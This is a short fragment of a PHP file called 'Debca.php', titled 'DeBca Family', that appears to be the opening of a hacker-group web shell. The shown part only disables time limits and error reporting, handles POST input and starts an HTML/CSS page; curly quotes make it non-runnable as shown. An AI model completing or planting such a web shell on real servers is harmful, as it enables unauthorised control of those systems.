Debca.php
<?php set_time_limit(0); error_reporting(0); if(get_magic_quotes_gpc()){ foreach($_POST as $key=>$value){ $_POST[$key] = stripslashes($value); } } echo ‘<!DOCTYPE HTML> <HTML> <HEAD> <link href=”” rel=”stylesheet” type=”text/css”> <title>DeBca Family</title><link rel=”SHORTCUT ICON” href=”http://www.hi5style.com/gr/heart.gif”> <style> body{ font-family: “Courier”, cursive; color: #fff; background-color:…